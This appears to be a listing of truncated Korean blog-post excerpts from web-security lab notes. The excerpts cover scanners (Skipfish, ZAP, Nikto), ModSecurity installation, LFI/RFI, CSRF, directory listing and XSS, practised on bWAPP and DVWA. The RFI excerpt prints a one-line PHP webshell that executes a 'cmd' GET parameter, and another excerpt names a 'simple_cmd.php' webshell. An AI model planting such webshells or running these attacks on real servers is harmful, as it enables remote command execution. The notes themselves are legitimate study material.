Skipfish 도구 bwapp 공격 skipfish -o /home/skipfish http://10.10.10.7 WPScan 도구 git clone https://github.com/danielmiessler/SecLists.git 위의 데이터베이스를 이용하여 스캔 가능

ModSecurity (WAF) 개념 오픈소스 웹 애플리케이션 방화벽 엔진. 웹 서버와 웹 애플리케이션 사이에 위치하여 악의적인 HTTP 요청을 필터링. 웹 애플리케이션을 공격으로부터 보호. Apache, Nginx, IIS 등 다양한 웹 서버와 호환 가능. 주요 기능 HTTP 트래픽 검사 HTTP 요...

modsecurity 설치 apt-get -y install libapache2-mod-security2 a2enmod security2 ls -al /etc/apache2/mods-enabled/ grep security2 ...

OWASP ZAP 도구 개념 무료 오픈소스 침투 테스트 도구로, 웹 애플리케이션의 보안 취약점을 찾는 데 사용. 사용하기 쉬운 인터페이스를 제공하며, 웹 애플리케이션 보안 테스트를 위한 강력한 기능 지원. 오픈소스 커뮤니티의 활발한 기여로 지속적인 업데이트와 발전. 프록시 기반 도구로 클라이언트와 서버 사이의 트래픽을 가로채 분석....

OWASP ZAP 실습 어택 모드로 취약 사이트 자동 스캔 Nikto 실습 Nikto로 스캔 후 결과를 html 파일로 저장

LFI(Local File Inclusion) & RFI(Remote File Inclusion) 개념 LFI 서버의 로컬 파일을 읽거나 실행할 수 있게 하는 취약점. 웹 애플리케이션의 취약한 파라미터에 악의적인 파일 경로를 삽입하여 악성 스크립트를 실행. RFI 웹 애플리케이션이 외부 UR...

File Inclusion LFI DVWA BWAPP RFI BWAPP 칼리 리눅스에 php 파일 생성 <?php $output = shell_exec($_GET[“cmd”]); echo “$output”; ?> 칼리 리눅스 아파치 실행 칼리 리눅스 아파치에 접근하고 명령...

CSRF 개념 사용자가 자신의 의지와는 무관하게 공격자가 의도한 행위를 수행. 사용자가 인증된 상태에서 공격자가 준비한 악의적인 링크 또는 스크립트를 실행. 해당 웹사이트는 이를 사용자의 요청으로 인식하고 공격자가 원하는 작업을 수행. 디렉토리 리스팅 개념 웹 서버 설정 오류로 인해 웹 사이트의 디렉토리 구조와 파일 ...

CSRF BWAPP 사이트 / DVWA 사이트 Get으로 새로운 패스워드를 전달하기때문에 취약함 디렉토리 리스팅 BWAPP 사이트 / DVWA 사이트 웹쉘 코드 simple_cmd.php 코드 G-Security Webshell <body bgcolor=#000000 text=#ffffff "> ...

XSS (Cross-Site Scripting) 개념 웹 사이트에 악성 스크립트를 삽입하여 사용자의 브라우저에서 실행되도록 하는 공격 기법. 공격자는 사용자의 쿠키, 세션정보 등을 탈취하거나 악성 코드를 실행하여 시스템을 장악. 세션 사용자가 웹사이트에 접속하여 활동하는 기간. 세션동안 사용자의 정보는 서버에 임시로 저장. ...